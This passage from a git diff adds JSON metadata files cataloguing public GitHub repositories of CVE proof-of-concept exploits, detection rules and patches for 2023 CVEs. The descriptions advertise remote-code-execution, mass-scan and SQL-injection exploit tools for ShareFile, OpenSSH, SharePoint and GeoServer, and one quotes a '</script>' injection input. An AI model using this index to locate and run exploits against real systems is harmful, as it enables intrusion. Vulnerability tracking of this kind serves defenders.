"watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 663114176, + "name": "CVE-2023-24488-SIEM-Sigma-Rule", + "full_name": "NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule", + "owner": { + "login": "NSTCyber", + "id": 128680605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128680605?v=4", + "html_url": "https:\/\/github.com\/NSTCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSTCyber\/CVE-2023-24488-SIEM-Sigma-Rule", + "description": "Detect CVE-2023-24488 Exploitation Attempts", + "fork": false, + "created_at": "2023-07-06T15:23:45Z", + "updated_at": "2024-04-20T01:39:03Z", + "pushed_at": "2023-07-06T16:32:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672880378, + "name": "CVE-2023-24488", + "full_name": "raytheon0x21\/CVE-2023-24488", + "owner": { + "login": "raytheon0x21", + "id": 92903333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92903333?v=4", + "html_url": "https:\/\/github.com\/raytheon0x21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raytheon0x21\/CVE-2023-24488", + "description": "Tools to perform exploit CVE-2023-24488", + "fork": false, + "created_at": "2023-07-31T11:29:16Z", + "updated_at": "2023-08-27T15:14:52Z", + "pushed_at": "2023-07-31T11:37:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-24488" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24489.json b/2023/CVE-2023-24489.json new file mode 100644 index 0000000000..7de2ce2f5e --- /dev/null +++ b/2023/CVE-2023-24489.json @@ -0,0 +1,64 @@ +[ + { + "id": 665550383, + "name": "CVE-2023-24489-ShareFile", + "full_name": "adhikara13\/CVE-2023-24489-ShareFile", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-24489-ShareFile", + "description": "This project is a Python script that exploits the CVE-2023-24489 vulnerability in ShareFile. It allows remote command execution on the target server. The script supports both Windows and Linux (On testing) platforms, and it can be used to exploit individual targets or perform mass checking on a list of URLs.", + "fork": false, + "created_at": "2023-07-12T13:01:33Z", + "updated_at": "2024-10-23T18:39:56Z", + "pushed_at": "2023-07-12T13:17:54Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 683690698, + "name": "CVE-2023-24489-poc", + "full_name": "whalebone7\/CVE-2023-24489-poc", + "owner": { + "login": "whalebone7", + "id": 125891350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125891350?v=4", + "html_url": "https:\/\/github.com\/whalebone7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whalebone7\/CVE-2023-24489-poc", + "description": "POC for CVE-2023-24489 with bash. ", + "fork": false, + "created_at": "2023-08-27T11:53:59Z", + "updated_at": "2023-10-22T21:09:08Z", + "pushed_at": "2023-08-27T11:59:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24517.json b/2023/CVE-2023-24517.json new file mode 100644 index 0000000000..41f245c92e --- /dev/null +++ b/2023/CVE-2023-24517.json @@ -0,0 +1,33 @@ +[ + { + "id": 705272522, + "name": "CVE-2023-24517", + "full_name": "Argonx21\/CVE-2023-24517", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2023-24517", + "description": null, + "fork": false, + "created_at": "2023-10-15T14:55:12Z", + "updated_at": "2023-10-15T14:55:13Z", + "pushed_at": "2023-10-15T14:55:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24538.json b/2023/CVE-2023-24538.json new file mode 100644 index 0000000000..ce2a3f2c8a --- /dev/null +++ b/2023/CVE-2023-24538.json @@ -0,0 +1,64 @@ +[ + { + "id": 698127324, + "name": "goIssue_dunfell", + "full_name": "skulkarni-mv\/goIssue_dunfell", + "owner": { + "login": "skulkarni-mv", + "id": 117360244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4", + "html_url": "https:\/\/github.com\/skulkarni-mv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_dunfell", + "description": "go CVE-2023-24538 patch issue resolver - Dunfell", + "fork": false, + "created_at": "2023-09-29T08:09:17Z", + "updated_at": "2023-09-29T08:20:21Z", + "pushed_at": "2023-10-04T05:29:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698334254, + "name": "goIssue_kirkstone", + "full_name": "skulkarni-mv\/goIssue_kirkstone", + "owner": { + "login": "skulkarni-mv", + "id": 117360244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117360244?v=4", + "html_url": "https:\/\/github.com\/skulkarni-mv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skulkarni-mv\/goIssue_kirkstone", + "description": "go CVE-2023-24538 patch issue resolver - Kirkstone", + "fork": false, + "created_at": "2023-09-29T17:18:42Z", + "updated_at": "2023-09-29T17:22:44Z", + "pushed_at": "2023-09-29T17:23:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24610.json b/2023/CVE-2023-24610.json new file mode 100644 index 0000000000..77138ec160 --- /dev/null +++ b/2023/CVE-2023-24610.json @@ -0,0 +1,33 @@ +[ + { + "id": 595331354, + "name": "CVE-2023-24610", + "full_name": "abbisQQ\/CVE-2023-24610", + "owner": { + "login": "abbisQQ", + "id": 21143253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21143253?v=4", + "html_url": "https:\/\/github.com\/abbisQQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abbisQQ\/CVE-2023-24610", + "description": "This is a proof of concept for CVE-2023-24610", + "fork": false, + "created_at": "2023-01-30T21:33:46Z", + "updated_at": "2023-07-14T01:02:42Z", + "pushed_at": "2023-02-01T16:02:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24706.json b/2023/CVE-2023-24706.json new file mode 100644 index 0000000000..d0ea83d682 --- /dev/null +++ b/2023/CVE-2023-24706.json @@ -0,0 +1,33 @@ +[ + { + "id": 716903745, + "name": "CVE-2023-24706", + "full_name": "hatjwe\/CVE-2023-24706", + "owner": { + "login": "hatjwe", + "id": 42887236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42887236?v=4", + "html_url": "https:\/\/github.com\/hatjwe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hatjwe\/CVE-2023-24706", + "description": "CVE-2023-24706", + "fork": false, + "created_at": "2023-11-10T05:43:52Z", + "updated_at": "2023-11-10T05:50:25Z", + "pushed_at": "2023-11-10T05:50:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24709.json b/2023/CVE-2023-24709.json new file mode 100644 index 0000000000..0a51bb46fd --- /dev/null +++ b/2023/CVE-2023-24709.json @@ -0,0 +1,39 @@ +[ + { + "id": 593598818, + "name": "Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "full_name": "DRAGOWN\/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "owner": { + "login": "DRAGOWN", + "id": 76569084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76569084?v=4", + "html_url": "https:\/\/github.com\/DRAGOWN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DRAGOWN\/Injection-vulnerability-in-Paradox-Security-Systems-IPR512-CVE-2023-24709-PoC", + "description": "In Paradox Security System IPR512 Web console login form page, attacker can input JavaScript string, such as \"<\/script>\" that will overwrite configurations in the file \"login.xml\" and cause the login page to crash. ", + "fork": false, + "created_at": "2023-01-26T12:13:51Z", + "updated_at": "2023-04-09T12:35:32Z", + "pushed_at": "2023-04-09T12:34:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-24709", + "paradox", + "security", + "systems" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24749.json b/2023/CVE-2023-24749.json new file mode 100644 index 0000000000..0ad1787817 --- /dev/null +++ b/2023/CVE-2023-24749.json @@ -0,0 +1,36 @@ +[ + { + "id": 606593182, + "name": "netgear-pwnagent", + "full_name": "mahaloz\/netgear-pwnagent", + "owner": { + "login": "mahaloz", + "id": 21327264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21327264?v=4", + "html_url": "https:\/\/github.com\/mahaloz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mahaloz\/netgear-pwnagent", + "description": "An exploit PoC for CVE-2023-24749, aka PwnAgent", + "fork": false, + "created_at": "2023-02-26T00:16:35Z", + "updated_at": "2024-01-28T13:11:38Z", + "pushed_at": "2023-03-11T01:01:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day-exploit", + "netgear" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24775.json b/2023/CVE-2023-24775.json new file mode 100644 index 0000000000..678b437790 --- /dev/null +++ b/2023/CVE-2023-24775.json @@ -0,0 +1,33 @@ +[ + { + "id": 622888276, + "name": "CVE-2023-24775-and-CVE-2023-24780", + "full_name": "csffs\/CVE-2023-24775-and-CVE-2023-24780", + "owner": { + "login": "csffs", + "id": 108768133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108768133?v=4", + "html_url": "https:\/\/github.com\/csffs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/csffs\/CVE-2023-24775-and-CVE-2023-24780", + "description": "my python poc CVE-2023-24774 and CVE-2023-24775 this sqli cve funadmin", + "fork": false, + "created_at": "2023-04-03T09:11:04Z", + "updated_at": "2023-05-09T10:32:10Z", + "pushed_at": "2023-04-03T09:37:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24871.json b/2023/CVE-2023-24871.json new file mode 100644 index 0000000000..0f164ae347 --- /dev/null +++ b/2023/CVE-2023-24871.json @@ -0,0 +1,33 @@ +[ + { + "id": 818310581, + "name": "CVE-2023-24871", + "full_name": "ynwarcs\/CVE-2023-24871", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-24871", + "description": "pocs & exploit for CVE-2023-24871 (rce + lpe)", + "fork": false, + "created_at": "2024-06-21T15:01:15Z", + "updated_at": "2024-08-28T15:24:50Z", + "pushed_at": "2024-07-17T12:34:16Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24955.json b/2023/CVE-2023-24955.json new file mode 100644 index 0000000000..27212a3b1e --- /dev/null +++ b/2023/CVE-2023-24955.json @@ -0,0 +1,33 @@ +[ + { + "id": 736570933, + "name": "CVE-2023-24955-PoC", + "full_name": "former-farmer\/CVE-2023-24955-PoC", + "owner": { + "login": "former-farmer", + "id": 151993362, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151993362?v=4", + "html_url": "https:\/\/github.com\/former-farmer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/former-farmer\/CVE-2023-24955-PoC", + "description": "Exploit for Microsoft SharePoint 2019", + "fork": false, + "created_at": "2023-12-28T09:08:47Z", + "updated_at": "2024-10-19T13:03:34Z", + "pushed_at": "2023-12-28T10:02:02Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-24998.json b/2023/CVE-2023-24998.json new file mode 100644 index 0000000000..f37c6fb920 --- /dev/null +++ b/2023/CVE-2023-24998.json @@ -0,0 +1,33 @@ +[ + { + "id": 620590502, + "name": "CVE-2023-24998", + "full_name": "nice1st\/CVE-2023-24998", + "owner": { + "login": "nice1st", + "id": 48778145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48778145?v=4", + "html_url": "https:\/\/github.com\/nice1st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nice1st\/CVE-2023-24998", + "description": "Apache Commons FileUpload 보안 취약점 테스트", + "fork": false, + "created_at": "2023-03-29T01:36:29Z", + "updated_at": "2024-05-19T00:57:16Z", + "pushed_at": "2023-03-29T04:56:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25136.json b/2023/CVE-2023-25136.json new file mode 100644 index 0000000000..75ebd8032a --- /dev/null +++ b/2023/CVE-2023-25136.json @@ -0,0 +1,287 @@ +[ + { + "id": 598673740, + "name": "jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "full_name": "jfrog\/jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2023-25136-OpenSSH_Double-Free", + "description": null, + "fork": false, + "created_at": "2023-02-07T15:33:41Z", + "updated_at": "2024-08-12T20:29:42Z", + "pushed_at": "2023-02-09T09:06:15Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 43, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 601784074, + "name": "CVE-2023-25136", + "full_name": "ticofookfook\/CVE-2023-25136", + "owner": { + "login": "ticofookfook", + "id": 99700348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4", + "html_url": "https:\/\/github.com\/ticofookfook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2023-25136", + "description": null, + "fork": false, + "created_at": "2023-02-14T20:13:16Z", + "updated_at": "2023-02-15T03:01:55Z", + "pushed_at": "2023-02-14T20:21:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605262093, + "name": "CVE-2023-25136", + "full_name": "Christbowel\/CVE-2023-25136", + "owner": { + "login": "Christbowel", + "id": 96427513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96427513?v=4", + "html_url": "https:\/\/github.com\/Christbowel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Christbowel\/CVE-2023-25136", + "description": "OpenSSH 9.1 vulnerability mass scan and exploit", + "fork": false, + "created_at": "2023-02-22T19:44:08Z", + "updated_at": "2024-11-09T19:12:10Z", + "pushed_at": "2023-03-07T10:43:36Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 102, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 629709771, + "name": "CVE-2023-25136", + "full_name": "adhikara13\/CVE-2023-25136", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-25136", + "description": "OpenSSH Pre-Auth Double Free CVE-2023-25136 POC", + "fork": false, + "created_at": "2023-04-18T21:47:47Z", + "updated_at": "2024-03-27T19:12:22Z", + "pushed_at": "2023-04-21T14:22:41Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634006271, + "name": "CVE-2023-25136", + "full_name": "nhakobyan685\/CVE-2023-25136", + "owner": { + "login": "nhakobyan685", + "id": 118097522, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118097522?v=4", + "html_url": "https:\/\/github.com\/nhakobyan685", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nhakobyan685\/CVE-2023-25136", + "description": "OpenSSH 9.1 vulnerability mass scan and exploit", + "fork": false, + "created_at": "2023-04-28T19:46:03Z", + "updated_at": "2024-11-07T18:03:29Z", + "pushed_at": "2023-04-28T20:29:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 648990454, + "name": "CVE-2023-25136_POC", + "full_name": "axylisdead\/CVE-2023-25136_POC", + "owner": { + "login": "axylisdead", + "id": 135433130, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135433130?v=4", + "html_url": "https:\/\/github.com\/axylisdead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axylisdead\/CVE-2023-25136_POC", + "description": "CVE-2023-25136 POC written by axylisdead", + "fork": false, + "created_at": "2023-06-03T12:36:42Z", + "updated_at": "2023-09-10T12:13:22Z", + "pushed_at": "2023-07-05T00:29:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "anus", + "openssh", + "poc", + "preauth-rce", + "yourmom" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660561885, + "name": "CVE-2023-25136", + "full_name": "H4K6\/CVE-2023-25136", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-25136", + "description": "OpenSSH 9.1漏洞大规模扫描和利用", + "fork": false, + "created_at": "2023-06-30T09:34:36Z", + "updated_at": "2024-07-22T05:09:33Z", + "pushed_at": "2023-06-30T09:36:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 687169714, + "name": "CVE-2023-25136", + "full_name": "Business1sg00d\/CVE-2023-25136", + "owner": { + "login": "Business1sg00d", + "id": 112768445, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112768445?v=4", + "html_url": "https:\/\/github.com\/Business1sg00d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Business1sg00d\/CVE-2023-25136", + "description": "Looking into the memory when sshd 9.1p1 aborts due to a double free bug.", + "fork": false, + "created_at": "2023-09-04T19:28:43Z", + "updated_at": "2023-10-21T09:31:07Z", + "pushed_at": "2023-09-08T17:49:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 694642627, + "name": "CVE-2023-25136", + "full_name": "malvika-thakur\/CVE-2023-25136", + "owner": { + "login": "malvika-thakur", + "id": 60217652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60217652?v=4", + "html_url": "https:\/\/github.com\/malvika-thakur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/malvika-thakur\/CVE-2023-25136", + "description": "OpenSSH Pre-Auth Double Free CVE-2023-25136 – Writeup and Proof-of-Concept", + "fork": false, + "created_at": "2023-09-21T12:05:35Z", + "updated_at": "2024-02-21T16:24:14Z", + "pushed_at": "2023-09-21T12:35:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25157.json b/2023/CVE-2023-25157.json new file mode 100644 index 0000000000..584437aefd --- /dev/null +++ b/2023/CVE-2023-25157.json @@ -0,0 +1,205 @@ +[ + { + "id": 650178194, + "name": "CVE-2023-25157", + "full_name": "win3zz\/CVE-2023-25157", + "owner": { + "login": "win3zz", + "id": 12781459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4", + "html_url": "https:\/\/github.com\/win3zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/win3zz\/CVE-2023-25157", + "description": "CVE-2023-25157 - GeoServer SQL Injection - PoC", + "fork": false, + "created_at": "2023-06-06T14:05:09Z", + "updated_at": "2024-11-24T12:48:18Z", + "pushed_at": "2023-07-14T10:40:17Z", + "stargazers_count": 165, + "watchers_count": 165, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 165, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 651841197, + "name": "CVE-2023-25157", + "full_name": "0x2458bughunt\/CVE-2023-25157", + "owner": { + "login": "0x2458bughunt", + "id": 134130770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134130770?v=4", + "html_url": "https:\/\/github.com\/0x2458bughunt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x2458bughunt\/CVE-2023-25157", + "description": null, + "fork": false, + "created_at": "2023-06-10T09:00:16Z", + "updated_at": "2023-09-27T05:13:54Z", + "pushed_at": "2023-06-10T10:41:08Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652314324, + "name": "CVE-2023-25157-and-CVE-2023-25158", + "full_name": "murataydemir\/CVE-2023-25157-and-CVE-2023-25158", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2023-25157-and-CVE-2023-25158", + "description": "GeoServer & GeoTools SQL Injection (CVE-2023-25157 & CVE-2023-25158)", + "fork": false, + "created_at": "2023-06-11T18:57:18Z", + "updated_at": "2024-07-12T14:49:36Z", + "pushed_at": "2023-06-11T20:18:09Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 652662180, + "name": "CVE-2023-25157-checker", + "full_name": "7imbitz\/CVE-2023-25157-checker", + "owner": { + "login": "7imbitz", + "id": 26263598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26263598?v=4", + "html_url": "https:\/\/github.com\/7imbitz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7imbitz\/CVE-2023-25157-checker", + "description": "A script, written in golang. POC for CVE-2023-25157", + "fork": false, + "created_at": "2023-06-12T14:34:14Z", + "updated_at": "2023-09-02T16:36:53Z", + "pushed_at": "2024-02-02T08:12:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 672729005, + "name": "CVE-2023-25157", + "full_name": "Rubikcuv5\/CVE-2023-25157", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/CVE-2023-25157", + "description": " GeoServer OGC Filter SQL Injection Vulnerabilities", + "fork": false, + "created_at": "2023-07-31T03:10:41Z", + "updated_at": "2023-07-31T19:38:13Z", + "pushed_at": "2023-07-31T22:44:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724490342, + "name": "Geoserver-CVE-2023-25157", + "full_name": "dr-cable-tv\/Geoserver-CVE-2023-25157", + "owner": { + "login": "dr-cable-tv", + "id": 152005084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152005084?v=4", + "html_url": "https:\/\/github.com\/dr-cable-tv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr-cable-tv\/Geoserver-CVE-2023-25157", + "description": "Geoserver SQL Injection Exploit", + "fork": false, + "created_at": "2023-11-28T07:23:00Z", + "updated_at": "2024-09-10T16:06:20Z", + "pushed_at": "2023-11-28T10:07:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cql", + "cve-2023-25157", + "exploit", + "geoserver", + "geotools", + "posgresql", + "postgres", + "python", + "python3", + "rce", + "rce-exploit", + "sql", + "sqli", + "vulner", + "vulnerability-detection", + "vulnerability-scanners" + ], + 